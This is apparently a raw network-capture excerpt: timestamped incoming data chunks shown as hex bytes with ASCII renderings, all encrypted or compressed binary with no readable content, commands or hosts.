                                                                                                                                                  2022-11-15 17:54:38 UTC1056INData Raw: 1a 65 be d3 21 f3 3f 2b 65 82 f5 1c 9c 2c f5 76 1d cd 51 cc 10 09 7a a5 ff 47 35 e1 2c df ad f8 fa 9d 10 7b 8c d3 2e dd 74 3a b9 8d 14 9f cc 82 41 ff 8b 5d c6 7f 3a 5d bd 3e db 1d 09 7f 99 e9 a2 1e 7d e4 32 23 5d 86 75 97 fe 72 da b8 02 0c e4 c2 b7 1e 03 a8 9e d7 21 6e 39 6d 16 c3 a3 5a 47 35 40 a4 9b b6 3b b8 3c 27 5b 36 94 57 80 00 06 8e 0f 06 75 1e 3a 25 c9 8d 7b ca bb 02 62 7c 6a f0 0f 59 68 ff 3f 0a 1d bd 99 06 46 fb 4f 0d f9 3b 36 a0 3b 84 8b 4e ea 72 c9 fd b9 36 97 01 32 e2 a2 d5 bd e7 fe 29 f8 2b f6 bd 4a 41 f4 d1 12 0f 34 0a d3 6f 78 10 d4 a0 5c 0d 0b 99 a5 7c 5e 9e d0 0a 04 b0 1f df b6 79 df 41 d5 c9 1a 1d f1 a4 c2 d3 0f 04 63 15 5a 63 9c 1d 97 2e 6a 40 a0 4d 0d 71 13 b4 28 ca 14 51 c8 8b 39 60 11 06 4e eb ae 48 4a d0 9c 17 f8 10 8c 2e 9c 89 0c
                                                                                                                                                  Data Ascii: e!?+e,vQzG5,{.t:A]:]>}2#]ur!n9mZG5@;<'[6Wu:%{b|jYh?FO;6;Nr62)+JA4ox\|^yAcZc.j@Mq(Q9`NHJ.
                                                                                                                                                  2022-11-15 17:54:38 UTC1072INData Raw: 00 fb aa 38 54 b0 f6 80 4b 84 a5 86 5b 9a 64 ea 19 59 e7 e9 53 08 ca 86 46 13 51 bc 2a 19 23 34 04 20 cc b9 1d b8 fd fc 17 a8 a2 f8 96 98 c5 73 6d 55 5f 15 fd 2e 1d c5 7a db fe 8e fc 2e f3 59 c4 74 e1 19 1e 98 c6 87 c6 cb fb f8 6f e5 f7 44 95 f4 b7 c2 1d 98 35 ee fc 93 77 9c fe 43 72 4d bf 94 89 31 ce c4 26 5d c6 15 7f de b1 26 e6 6e 01 a9 fa ff 5c e4 7d b5 cf 15 f0 f3 e6 fd 4b 12 69 a6 ea 33 ea 99 0d 58 9f 6e 16 ff a8 fc 45 d1 ea 17 51 56 95 90 69 65 76 46 b0 c5 1b 6e 08 e0 c6 d0 b7 1f af ef 4d 05 02 1b 04 0d b8 fa 64 3e b2 23 b7 1c 90 a9 ef 95 be 21 75 8e ad 64 f2 eb 7e 7c b0 c2 ac eb d9 4f bf 43 f3 ab 2e c9 13 be 3f df 9b 2b f9 68 1f 63 a6 24 e3 4b 1e 40 2f cc f0 a6 a0 79 8d 3f 6b 8d 62 17 a7 89 29 28 8c 95 d2 b6 29 07 bf cf 1f c4 04 18 2c dd 7f c5 3c
                                                                                                                                                  Data Ascii: 8TK[dYSFQ*#4 smU_.z.YtoD5wCrM1&]&n\}Ki3XnEQVievFnMd>#!ud~|OC.?+hc$K@/y?kb)(),<
                                                                                                                                                  2022-11-15 17:54:38 UTC1088INData Raw: 94 a9 f6 ca 61 94 e5 a9 ae cf 1a 92 99 0c d6 9b 5b b5 ab e8 4d 7e 27 37 f9 1d 09 11 0e e3 51 c3 4c 85 8e ac bd ad 3e e6 95 bb 50 a0 5f 8c 78 4d b8 ae 39 71 b4 37 a8 d0 7b cf 83 64 0b b0 bc ec ae 88 f3 db df 23 85 5b 83 78 84 4f 8c 8f de c6 03 98 f3 6a 02 eb 2d 07 e7 bf 1b 41 b7 99 8d d3 cc 3c d0 72 32 b6 a6 44 32 79 34 dc a8 28 31 cd c6 60 1c c7 08 fa 58 f5 20 9f 97 b4 15 fe 09 08 8a 91 f5 7f 9a db 57 88 74 03 62 71 80 2c 57 1e 62 71 28 05 8a 4c 24 f5 b7 5a a3 6f b1 fa dd 0a 7a 3e 22 43 dc cb 1e ff ea ed 73 ac 75 94 e4 6f 71 0c dd 81 08 5f 35 ac 4a 07 27 cc 62 01 f4 89 18 dc 78 4a d8 16 02 9a 3c d7 8a 4f 5b b9 f7 09 75 1a bb ff f2 31 f1 4d c1 29 f2 fb c4 d2 3a e4 0f 5d b5 8e e0 6f 2b 09 a2 0e 82 67 9d 62 46 9b b4 0c b4 bc e2 43 3d 2b 39 94 65 13 24 8f 90
                                                                                                                                                  Data Ascii: a[M~'7QL>P_xM9q7{d#[xOj-A<r2D2y4(1`X Wtbq,Wbq(L$Zoz>"Csuoq_5J'bxJ<O[u1M):]o+gbFC=+9e$
                                                                                                                                                  2022-11-15 17:54:38 UTC1104INData Raw: 03 d2 6d 76 66 3f 4b 1a 7d 07 f2 e3 ff 05 3d 12 9d ae 9a a5 ed 48 a7 bb 49 7a 8b 6b 80 10 a0 cd 7f ed c1 74 3d 84 32 ce 31 3b e6 48 ca 90 8b ae 71 31 2c b3 6b d2 25 f6 55 45 52 95 ce 7f 11 34 41 f8 32 ff 6b 7f 3d 04 a6 26 00 8f a6 fd 28 5e 63 9a d7 da f3 99 ab 03 44 86 84 e4 22 2e cb c0 0f 9f 7b dd 71 b8 84 4d 2f 54 a0 50 3e b5 9f 84 82 29 fe c2 b9 30 2e a6 73 dd 99 7c 9d 0a 26 34 06 3d e4 a8 7a 98 48 e0 30 ad fe 71 ed d4 9c 45 1f 55 e8 ba 65 21 86 d2 6f 14 ef 03 54 f6 27 3e 3f e5 0a ca 7e e5 90 42 ad 98 cc 66 6f 1a cb 27 de 8b 48 88 07 ed 13 a8 20 c5 e7 c7 8f 2f e9 d8 d7 b6 5f 1e 85 b6 b4 b1 a9 b6 33 5b 9a 1d 88 f8 80 f4 df bf 95 b7 25 d7 06 9e 9d b4 65 a5 b3 9c 7a e8 ea 65 b1 82 78 b1 14 b3 a8 c9 3a 46 00 7e 44 ec a0 d7 c4 f2 c0 b1 19 27 0b 00 0d ab 36
                                                                                                                                                  Data Ascii: mvf?K}=HIzkt=21;Hq1,k%UER4A2k=&(^cD".{qM/TP>)0.s|&4=zH0qEUe!oT'>?~Bfo'H /_3[%ezex:F~D'6
                                                                                                                                                  2022-11-15 17:54:38 UTC1120INData Raw: 61 31 8c de 81 c5 b6 d2 67 da 14 d6 b5 8d 5c 12 a6 b9 ce b6 d5 a6 5e 71 61 74 8a 0a 02 26 2c 47 2b 87 7d ca 9f 0f 9e 9c cf e6 31 5a fa 49 73 35 67 64 08 60 06 0a 1f 70 e4 5c 5f 91 22 b8 bf c5 fe 17 90 0a 59 53 bf 88 e7 c0 db 1b 40 a5 e0 c5 98 4d 37 3b 09 ff 87 17 4a 49 fe 35 23 8e 6e c3 2a 76 27 c7 b5 e6 c5 63 8b 33 37 d4 cd c7 fe 19 1a 38 1a 78 46 c4 91 07 c6 45 00 9f 6f f7 6a e1 a0 6d 80 88 3d dd 73 a9 56 1d 19 96 e8 8d 12 13 94 dd 9b df 5c a1 1e 1c 25 c6 2f 92 a3 7d 22 f1 f7 78 bb 39 c6 fa d0 39 a7 46 42 ce 02 99 15 a1 0a 03 1a 6b 0a e1 b1 a8 66 05 4a b3 b3 db 5b 13 31 19 28 59 de ef 45 a6 c7 7f d7 bd 66 e3 f1 9c c4 f3 0c dc 04 ac 40 2c 92 76 1e 80 13 2d 09 fd 50 d7 44 39 23 73 3c 10 ce d4 31 c3 ac 05 94 3a 20 2b 1c 23 56 3f b6 02 25 0b 45 9d 69 b8 db
                                                                                                                                                  Data Ascii: a1g\^qat&,G+}1ZIs5gd`p\_"YS@M7;JI5#n*v'c378xFEojm=sV\%/}"x99FBkfJ[1(YEf@,v-PD9#s<1: +#V?%Ei
                                                                                                                                                  2022-11-15 17:54:38 UTC1136INData Raw: 84 0a c8 89 d9 4f d5 b6 ac e4 6e 96 90 b0 f6 98 fa 5f 7f 81 42 2e 91 f6 ff 20 f3 f2 88 30 61 0d ac 01 d5 a4 36 e5 0c 58 cd 35 c7 95 e1 af 5f cd 70 82 06 a7 50 38 d2 2f 33 7f c7 7d 63 76 48 77 dc a9 f8 e7 71 4e d8 69 dc 8e 8e ac 8e 21 28 62 f2 15 aa 48 f8 a5 06 0d c9 87 b2 56 e4 fa 67 dd 85 03 7a c3 59 63 fc 0a a7 18 c1 43 91 68 2b a1 72 08 10 69 5d be b6 38 42 60 8a bf 03 f8 d9 8f 3b 3a 29 ea 4b 60 8d 63 6b c7 d3 6a 5c 96 f4 db cb ac 44 ae b8 a1 cd 13 fe da 16 b3 25 ba 98 d4 6e 66 70 53 97 f0 50 30 03 c9 70 8f cf ee 38 6e f8 cc 4f 66 9c 94 db bf 4e a8 19 e4 3c 89 e5 df b5 9f 57 7f 1a fc 70 2a 42 a0 4d 72 28 f1 88 72 43 e7 5b 1a 92 2d 6e 99 14 f3 ee d7 84 62 80 7c a8 53 e4 37 c3 d0 07 7e 4d 00 26 1e b2 7e 1b 4d cb b5 f8 65 13 eb 09 e5 97 fd a5 7e fe c5 05
                                                                                                                                                  Data Ascii: On_B. 0a6X5_pP8/3}cvHwqNi!(bHVgzYcCh+ri]8B`;:)K`ckj\D%nfpSP0p8nOfN<Wp*BMr(rC[-nb|S7~M&~Me~
                                                                                                                                                  2022-11-15 17:54:38 UTC1152INData Raw: f8 56 2a 91 04 8b 35 ea ae ef f9 37 23 49 96 ad 8f 24 14 6f 7b 50 28 cb 78 55 5f 74 a6 bb 01 70 23 78 b3 37 23 70 11 24 57 b8 e4 dc 00 b3 65 c3 5c 5e dd a6 1a 91 27 b5 b8 5d 23 2d 5d 26 bb 2c 2d 9a 99 41 2b 03 25 7c 8e 35 ba 8b 1b 93 3d a0 9d 00 6d 4b f6 25 b0 33 2a 82 6d 8a 7e 04 f3 1b cb 8f ce cc fa 0e ed a0 1a 25 58 6e 11 41 28 c5 96 ab 2c 3a 16 38 4d b8 62 59 e2 5f 2b ab 81 87 77 19 96 53 57 b3 da 29 9b d9 81 de 4c 17 7d fe e4 15 ff 26 f7 3d 5e 6a 47 39 c7 db 99 d8 60 08 81 85 f9 77 73 dc f0 5b 59 28 97 8e 4b c1 b7 24 56 ea 37 cc ea 48 eb 82 57 55 c7 6a 30 eb 24 f5 de b3 bc ef af 2c fc f2 24 fa 1a 04 6f f2 8d ca 30 61 25 2f a9 f8 a9 84 04 dd 48 20 18 c8 c0 6e 51 7e bd 34 1d cc 87 96 ec 61 f5 96 32 8a c0 ff 52 0c a7 8e c4 72 76 1f 0a 64 76 18 6b 7e bf
                                                                                                                                                  Data Ascii: V*57#I$o{P(xU_tp#x7#p$We\^']#-]&,-A+%|5=mK%3*m~%XnA(,:8MbY_+wSW)L}&=^jG9`ws[Y(K$V7HWUj0$,$o0a%/H nQ~4a2Rrvdvk~
                                                                                                                                                  2022-11-15 17:54:38 UTC1168INData Raw: 0c d1 46 5d 4b 60 62 28 c9 da d5 dc 98 fc 96 64 7d 39 22 e9 b7 bb 2e 03 9f 52 e1 23 1c 4a ac 16 8c 5d 7b 49 e6 46 39 14 40 53 f1 fb 16 53 41 02 ed 9d 99 d1 0e 17 c9 0c df 47 20 c8 ba 0d a9 04 b7 96 d0 c9 ec 5f b6 4e 19 7f fc aa 68 5e a8 fd d2 f8 f1 1f b3 e5 35 54 63 ca dd 7f ea 93 28 3e f2 5c 80 38 66 d5 56 85 6e 5e ac 59 71 3f 7e 0b ba 4d a5 fe 1f 9d dd 98 b0 03 e0 45 fc c8 72 b9 d2 32 d5 1e bd b7 cf 9e d6 e7 ea a3 1e 76 b9 68 15 2e 7e c7 62 ba b6 db fe 5a 6e af 9e 9c 90 5a 39 3d ac 20 57 32 42 0b 24 85 2a cc 06 7a 9b ea fa 3b 41 73 eb 83 de ab 31 01 82 1a b1 61 6a 95 70 de 5b fa 6a 58 75 10 d1 4c 92 9a f3 a0 7d 2f df 07 12 cf 19 1a 16 f9 42 a0 2f 0e 98 3e 6b cf 99 ab 75 16 99 db 26 65 54 2d f0 d9 82 d2 30 54 50 34 40 2d 0d 7d 7e a7 00 35 9f 30 62 8b 41
                                                                                                                                                  Data Ascii: F]K`b(d}9".R#J]{IF9@SSAG _Nh^5Tc(>\8fVn^Yq?~MEr2vh.~bZnZ9= W2B$*z;As1ajp[jXuL}/B/>ku&eT-0TP4@-}~50bA
                                                                                                                                                  2022-11-15 17:54:38 UTC1184INData Raw: e9 90 01 88 fc 36 f8 57 0a 77 49 f2 ef ca 77 ea 1e 2e ce 55 7b 5c a0 ae f5 8a 75 b6 8a 84 9a fc cc 14 f9 8f 16 c1 57 c1 6b 57 e8 73 9f 38 3b cc 59 d1 8f f8 fe 8e 3b c8 6a a7 db 66 26 90 b1 b6 fa e4 29 9a 95 9c c4 de 0b 74 4a 2d 4a 90 f9 48 ff ea 0d 98 bc 95 42 5a 0e 1c 05 0b 8e 6c dd 3f f9 5c fe eb 17 79 88 57 32 48 7f 4c f9 c6 8f 27 c4 7c f3 d7 01 7c ab fc 0a a2 92 19 01 e6 f7 e4 59 32 fd 15 23 58 41 56 c4 a3 c0 88 a0 c0 13 16 bf 3d b4 c4 6d 47 71 63 69 fc f7 03 c1 72 ba cd eb 2a 8f 36 5e 8b f7 ad 4a 9a 6f 65 c0 6e 15 f4 1d c3 70 a6 fa d5 87 8b c6 6f e3 14 9c 9f 1f d0 61 6d 71 68 44 30 b9 4e 3d c2 47 a7 3d 1c 58 1a 42 6f bd ff 0c c6 7b 4d 11 44 61 18 82 e7 04 b3 80 d1 ac 30 75 41 97 51 76 fc a1 dc 45 4a 7b 7d d6 05 cd 1f 7c 5d 76 c2 55 31 7b bc 95 eb 3d
                                                                                                                                                  Data Ascii: 6WwIw.U{\uWkWs8;Y;jf&)tJ-JHBZl?\yW2HL'||Y2#XAV=mGqcir*6^JoenpoamqhD0N=G=XBo{MDa0uAQvEJ{}|]vU1{=
                                                                                                                                                  2022-11-15 17:54:38 UTC1200INData Raw: 12 e9 81 91 b2 99 63 73 4a 1f 67 cd 0d 35 90 fb a7 3d 93 27 a1 c8 b4 a2 97 db 7f 5e 75 80 91 35 5c 2f 85 66 fc 01 68 70 ed 7d 85 b2 8d c2 3a 15 2c f8 a2 39 55 ee 62 1b a7 b7 7b 4b 98 eb 6b ef 79 16 fa 1b 67 68 5c de 0f c5 a8 b4 96 0c c9 a0 87 e0 e5 83 a0 d5 50 da 40 cc ce 2a 5e 72 47 cf bd f6 15 bd 55 db cb ee 13 32 1b a6 42 52 4a 80 0d 71 8f 62 ac 72 fc 3a 50 9d 3d 98 28 b5 ed 72 51 d0 90 79 ab bb f8 16 c9 8f a7 31 2c 1c 01 48 f9 ee 27 ef 42 a7 49 b1 a9 6c 26 78 4e e7 8a 24 5c 40 a8 52 9a f7 ab 48 2b 29 a1 ae 01 0b 46 f5 09 6e 5c c9 b9 ba 7f b3 de 40 91 54 2b 88 89 94 df 37 f7 55 be d4 72 84 eb b8 b8 c1 a9 4f d2 43 71 08 77 0e 29 fd e1 29 ba 5b 63 ba bd 47 7a 0a f4 97 db a5 04 9e 89 29 e7 a1 4b 1f 05 81 4c 8f 9e 18 7e 99 06 1e 87 15 e4 1a 11 cb 9b ae 3b
                                                                                                                                                  Data Ascii: csJg5='^u5\/fhp}:,9Ub{Kkygh\P@*^rGU2BRJqbr:P=(rQy1,H'BIl&xN$\@RH+)Fn\@T+7UrOCqw))[cGz)KL~;
                                                                                                                                                  2022-11-15 17:54:38 UTC1216INData Raw: a2 f5 44 47 e0 bc 92 79 42 16 c6 37 06 d5 9b 94 bb 5f ab 89 ac 5d b9 00 9a 88 18 94 32 72 58 a3 db 9a 93 53 fc bc 36 b4 c8 18 9c d7 f8 74 9d b4 4a 1e 2c e8 7a dd 6d 74 d7 aa e9 55 de 75 75 9e 1f f4 cd 8e 51 31 b4 76 5f ee 68 6e cb d5 52 37 14 f4 01 05 97 57 6a cf c6 65 9c ff 10 6b 20 62 ef 9e 7b cd fc 33 db f2 ec 95 d6 5a 7b 51 8b 16 8c c6 6c 2c 47 88 71 d2 f4 93 f4 e8 4b 3e f6 4c 3b 2c 7b f6 70 d4 13 5d 4b 13 7a 76 e3 29 62 9c de a3 bc 27 0d e3 a8 db 90 06 a0 8a 94 89 d2 76 2f 04 6e c7 54 f3 23 47 f4 ca 4f 62 45 0f e6 ff cb 12 09 96 4e cb 53 dc e3 33 93 34 f5 10 0e 79 58 81 46 1b 8e 69 35 26 a7 6e bb 7c 34 b4 9a d2 07 c1 97 c8 9f 9a 71 0a 80 c3 69 72 0c 79 86 f1 35 0d 1e f7 3b 94 72 6f 79 18 8d 14 59 9e b6 6e 89 3d 4f 77 a9 cd 3d 54 8d 17 7d a1 5d 15 37
                                                                                                                                                  Data Ascii: DGyB7_]2rXS6tJ,zmtUuuQ1v_hnR7Wjek b{3Z{Ql,GqK>L;,{p]Kzv)b'v/nT#GObENS34yXFi5&n|4qiry5;royYn=Ow=T}]7
                                                                                                                                                  2022-11-15 17:54:38 UTC1232INData Raw: 3c 22 90 ae 0c df 20 7b a1 1e 5c f9 75 16 33 c4 ae 50 0f e8 21 a1 ce 5d f8 a9 bd e0 66 e0 99 3b d0 16 21 6d 9a d6 a0 de 6c 4c 75 6f 93 7c d8 3e c9 0d 2b e5 79 08 b2 6b 55 6e 4d 23 b1 5d c6 11 4a f6 98 56 e8 e3 07 99 db 8f ab 99 7e 3a 06 fe 28 0d 53 12 d4 ec af d7 c0 62 36 91 d0 6d 65 23 e1 0d de 72 a8 85 c5 a9 10 2a f3 01 40 dd 55 21 53 23 5f 1e 6b b0 98 42 8c 49 07 e5 ff 6c 17 40 79 b8 de 93 b0 18 97 af 03 ce 7f c3 eb c5 b3 87 e4 6d 8b e5 b6 27 c4 02 56 c2 bb 9f f0 62 9d 29 dc 41 84 05 bf 01 87 2d 47 80 4b e4 ae e2 ce 21 1c c5 94 cc fb bc 8f 2b 3b e0 93 76 85 07 fc 37 ce 14 9a 74 dc 81 43 c2 75 b5 27 09 1d 19 fd 16 93 a1 c4 01 e8 87 62 85 82 fc 1d ac 2f 6f f7 a3 18 ec fe 36 32 2f 46 3b e8 88 0b 4e 30 07 e5 b9 2f 42 a1 d1 bf 00 95 41 44 55 93 21 bb 76 7f
                                                                                                                                                  Data Ascii: <" {\u3P!]f;!mlLuo|>+ykUnM#]JV~:(Sb6me#r*@U!S#_kBIl@ym'Vb)A-GK!+;v7tCu'b/o62/F;N0/BADU!v
                                                                                                                                                  2022-11-15 17:54:38 UTC1248INData Raw: d7 81 0d e9 d6 63 ee 2c a8 b7 fa c0 a6 bf a0 1e a7 7b d1 67 6b 75 19 a7 80 ab 1e 9b 57 1b e2 2a 0f d6 a6 19 96 70 0e 0f ed cc 38 f3 b9 a5 2d 1c 34 05 61 a4 8b 44 fa ab 36 f5 74 39 9b f2 89 29 b0 1e 09 71 cb 19 a4 50 52 4d 37 b4 6e 2e 67 7e eb aa 42 54 c2 12 6f 75 89 e4 fd e2 ca 9d e0 a8 bc 44 fd 74 be 52 f9 f6 89 6a 89 94 ce 69 45 1c ef 7e 76 3e b8 17 da fa 21 22 f6 7f 83 ba 32 aa 73 2f 39 01 68 e4 fd 7d 57 80 6f 9a f4 42 19 93 6b 24 64 95 0e f3 5b 0f f6 63 1d 16 55 e2 66 ba f2 d7 51 f4 0e 01 fa 56 ad 59 2b 32 f3 68 c2 8c 7c dc 2d 65 23 76 ec a7 90 06 b8 68 37 34 ad 86 05 b4 f8 92 3a 3b fb 37 f3 72 b8 67 27 34 6e e3 38 73 69 69 08 17 0c 34 e2 1a fa b4 91 aa a1 9c 21 4a 68 aa cd 23 bc e9 83 56 8b 3b 3c 91 54 f9 b9 32 85 03 65 f1 8c 6b 3e 3f 4b 67 7a 03 25
                                                                                                                                                  Data Ascii: c,{gkuW*p8-4aD6t9)qPRM7n.g~BTouDtRjiE~v>!"2s/9h}WoBk$d[cUfQVY+2h|-e#vh74:;7rg'4n8sii4!Jh#V;<T2ek>?Kgz%
                                                                                                                                                  2022-11-15 17:54:38 UTC1264INData Raw: 22 c4 f4 95 5a 58 47 15 90 f4 80 59 5e 17 1e 4d 85 73 97 97 2d 0c b5 f9 a3 b7 14 93 b7 3d 78 ad b6 20 61 98 b0 72 2c 4b 72 0f 92 e7 18 12 31 59 ff 58 32 03 49 e4 b2 7d c2 0a 4e 70 91 9b 30 d8 51 c7 5e 1e 20 14 8a 6c 9c 37 f9 c2 90 03 42 89 30 21 e5 74 3f 6f 34 3e a4 cb 30 cb 4a 2e 6e ef f6 6d de 8b 66 8f 94 fb dc 4e ba 02 1e 17 1f 3e d5 54 28 51 c7 c2 d1 aa 1f 49 99 28 59 bc 0e 49 5d cc ff 63 0c e2 87 6f a8 c8 8c f2 d8 6b 9e b6 cf 5f d8 31 be e9 15 08 59 4a 43 74 69 1c e4 b9 46 c0 06 63 39 76 c3 5e 97 94 60 c7 b0 aa 26 3d 58 e6 c9 cf 97 2f 1e 56 1c e4 1f 0b b1 5b ad 79 0c 6f ea cb dc 00 35 53 5b ae 65 ff e0 2a dd 44 34 6f ad 3b 72 c7 70 3a ac 7e ed 65 9d f8 c4 59 2e ba 67 97 eb 98 64 15 bc 75 df 27 e6 b4 2e e1 65 ff 20 07 53 30 58 e7 aa df b6 76 1a 30 8b
                                                                                                                                                  Data Ascii: "ZXGY^Ms-=x ar,Kr1YX2I}Np0Q^ l7B0!t?o4>0J.nmfN>T(QI(YI]cok_1YJCtiFc9v^`&=X/V[yo5S[e*D4o;rp:~eY.gdu'.e S0Xv0
                                                                                                                                                  2022-11-15 17:54:38 UTC1280INData Raw: 63 12 6a 09 3d cd b6 74 0a d7 dc bd 54 89 ed 9b 69 cc 35 6d a3 70 43 2e 31 17 43 7a a4 9c 57 93 92 02 d7 0b cc ef 6f 0d e4 b1 84 ca 3d 02 e0 d0 28 56 3e 38 68 8b fc 53 fa 59 c9 0b 43 c1 99 80 84 0b 65 76 cd 72 20 8e be cb 2b 4e a0 53 bd 88 b8 eb 82 44 65 59 2f 21 2d be d0 90 e6 8d aa 9d c8 db b1 c9 53 6f 6f 63 17 fc 8f 68 b3 dd 79 60 b8 f8 3b 28 ad 2f f0 76 52 38 51 b4 ba 03 34 91 3b 17 b0 96 50 60 87 a0 4e 13 35 53 16 bc bd bb c9 c7 4d 91 a3 ee ff f2 dd bc 0e 3b 62 2a 4c e3 ac fd c1 dd 71 43 cc 7c aa d8 57 62 a2 9f 29 1e 70 3c d0 bc ff ee f6 c6 5d c1 f1 b5 3f 83 f8 81 b2 df b9 a7 49 b4 1a 0d 72 b6 f7 7d d0 16 de 38 8d 79 ca ed e6 70 e2 c2 7b 90 cf 6b ca 97 5f 71 a7 7c 5b 23 cb db ef a6 fd 74 38 a4 29 da 10 d5 6f b9 1c 9a 25 52 52 9e 03 f2 3f a5 29 64 54
                                                                                                                                                  Data Ascii: cj=tTi5mpC.1CzWo=(V>8hSYCevr +NSDeY/!-Soochy`;(/vR8Q4;P`N5SM;b*LqC|Wb)p<]?Ir}8yp{k_q|[#t8)o%RR?)dT
                                                                                                                                                  2022-11-15 17:54:38 UTC1296INData Raw: 95 83 12 b0 f5 e2 35 52 04 16 50 37 f0 53 62 41 e1 31 f3 32 26 54 de 2b 41 3e 60 a9 14 7c f7 ff e1 b7 bc 58 1b bc 24 fc 46 c2 62 11 2d 71 c4 70 22 95 5b 1e 86 80 ac ca 8b cd b7 cf 64 41 36 8e b2 5c 2e 78 26 ee 2f 58 5f db 5a 60 50 5d 6f 9e ec f0 33 19 51 fb 65 ee 78 f0 7d 73 3e f4 7e c4 29 a6 67 9c 6c b6 60 0d bd 00 54 3a f1 78 a1 a7 3c a9 2b e8 81 de 0e 86 26 6e af 48 e1 d9 4a fc d4 0b d6 1e 3a c8 26 00 1a 4d 57 14 8f 66 1e ee d4 07 c4 00 e1 31 af 93 8d 50 38 ac a4 7c 74 ff 2e 3a c3 33 47 66 32 35 65 5a d1 5c 7b 6e 81 cd c7 3e 80 ca 3e 4b 92 00 74 e7 99 10 f3 b8 ae 84 6f ee 4a 1d 34 66 45 87 3b 19 5d 1c f6 cb 43 87 e2 14 33 61 73 a7 2d b7 97 45 6c a6 56 c7 56 91 9e cc 6d 79 f3 4d 42 fa 77 ec 14 43 0b 95 88 87 f8 09 20 a5 55 61 eb c7 f5 f9 99 d0 5c 2f 95
                                                                                                                                                  Data Ascii: 5RP7SbA12&T+A>`|X$Fb-qp"[dA6\.x&/X_Z`P]o3Qex}s>~)gl`T:x<+&nHJ:&MWf1P8|t.:3Gf25eZ\{n>>KtoJ4fE;]C3as-ElVVmyMBwC Ua\/
                                                                                                                                                  2022-11-15 17:54:38 UTC1312INData Raw: 06 39 c3 88 12 e0 b1 e1 08 59 97 2f ea a0 64 f8 a1 aa dd df a8 c7 39 20 92 c3 fd 8d a9 3a d4 9c 1d ef 08 74 98 37 3b 62 d0 82 0e aa 5a df 88 34 96 b6 02 c3 32 f1 eb 2b 0f b6 bf 4b d8 a4 53 97 26 58 28 38 d8 1e 25 be 03 d5 2f 5d 3a ec 07 99 db 29 b6 ad f8 d6 9a ed 0f 6d 0f 33 b3 ca ab 9b 99 89 47 4a 95 44 0e 9e 36 e5 2e 2d 60 b2 a0 bd 2c dd 66 a0 71 cd d9 15 b2 14 08 59 10 ef 8f 05 44 4b c1 0b 03 fb dd 05 e4 97 a9 e1 fa ef 14 70 67 ba 7b 18 9b 6c ea e5 ce 74 ef a6 a7 84 c4 20 3a 98 f5 d8 59 db 09 e2 7d 2a 17 16 b2 ee ae 73 ee 6c 1b 9f 69 76 83 78 53 79 cc 47 82 85 f2 3c 3d ed a0 c7 51 21 60 9d 3c 3e bb 31 ab 16 3b 16 73 d3 d3 40 a7 19 c9 24 e5 22 d2 0a d4 ff ce 7e 00 45 bd 00 fa 51 23 70 e6 8b 80 a0 9b 46 98 81 f8 7a d1 e0 32 55 9e 8d 0c d2 e9 da f2 0b 2c
                                                                                                                                                  Data Ascii: 9Y/d9 :t7;bZ42+KS&X(8%/]:)m3GJD6.-`,fqYDKpg{lt :Y}*slivxSyG<=Q!`<>1;s@$"~EQ#pFz2U,
                                                                                                                                                  2022-11-15 17:54:38 UTC1328INData Raw: 63 9d 7a 3d 32 93 5c 79 6f c4 f5 34 8a 5c cf be 61 32 c6 16 7d 8d bc e0 5c 6a 5b 67 24 51 33 a9 58 59 0c 6a b6 79 1d c4 44 dc cb d9 ad 27 98 31 bb 7b 05 ce 53 a3 15 6e 27 ad b1 16 d0 98 4c 75 3d d0 c1 67 80 a5 b7 62 14 d6 7f 30 f0 a6 e4 12 2b 99 d8 01 04 d0 08 b5 aa a7 af ea 64 67 7c d2 0a 2c 9e 49 4f c6 e2 11 0c 6f 35 30 53 02 7d 0c 7f 25 50 41 99 2f 40 cc 94 6c ed 52 5e aa df 03 81 cb c1 fb b3 fa e9 10 62 98 f1 19 91 67 a4 4f af 90 c8 51 4f 60 2a b7 a5 10 78 5d df 0b d4 6b 3f dd 18 bc 6d 6f 54 31 79 4a 23 7a ab 1c 43 9a 49 06 05 66 c9 69 e7 c3 9a 8c 7e 52 7b 6b e8 bb 00 31 9a dd 88 9e e5 6e 15 32 89 fa ea 29 dd 70 d9 7e c8 61 c4 82 62 ee 2e b7 78 36 c0 0a 0e 0d d0 29 63 33 04 f6 7e 59 26 b6 50 86 df 41 dd 9f 09 8a 46 a5 7c da 0e 2c 73 c9 d1 7f 8e 4a a0
                                                                                                                                                  Data Ascii: cz=2\yo4\a2}\j[g$Q3XYjyD'1{Sn'Lu=gb0+dg|,IOo50S}%PA/@lR^bgOQO`*x]k?moT1yJ#zCIfi~R{k1n2)p~ab.x6)c3~Y&PAF|,sJ
                                                                                                                                                  2022-11-15 17:54:38 UTC1344INData Raw: 84 1d 05 58 36 e3 2b 31 19 77 07 db 03 c7 d6 65 6d 5c db 6a a3 75 96 84 c8 91 21 bc b5 a7 db 4a 3c 86 a9 59 97 84 11 77 00 6b d8 ad 39 23 c0 e4 42 99 17 e6 05 54 7f df 19 83 38 38 0e 97 7a a5 7f d1 7c 45 29 57 b9 42 5e 5a 81 54 f3 8c 0b 7d 94 89 0d c0 8b 3e e9 89 ae 62 02 36 33 da c8 30 87 04 e8 1e 55 f2 75 5a 7e 80 5d 45 4f 30 04 fa ec 9c 5d 19 c1 a3 00 60 b3 8e e7 45 b8 1f 85 be 0c f4 c4 54 1a d7 02 07 0a c8 95 c3 49 4d 5c 94 50 00 25 23 e6 17 83 bc d3 c7 c2 24 ea af 5a 8e bc 5e a1 f4 5b 69 29 6a 4b b7 76 00 6b 75 6e 1a 0e e1 11 18 fc ee cc 2e 82 8b 95 e7 94 92 e9 11 4a 35 9b a6 44 7c 99 91 c3 5f 6a 05 02 07 b7 6f 75 ad 90 30 9a 15 85 8c e9 36 5a 53 35 d9 e0 16 a0 dc df 17 97 88 1d 31 a1 aa 46 38 d3 a5 74 c9 a4 b6 11 74 b3 1a b9 c0 33 c2 15 0b da cc 0d
                                                                                                                                                  Data Ascii: X6+1wem\ju!J<Ywk9#BT88z|E)WB^ZT}>b630UuZ~]EO0]`ETIM\P%#$Z^[i)jKvkun.J5D|_jou06ZS51F8tt3
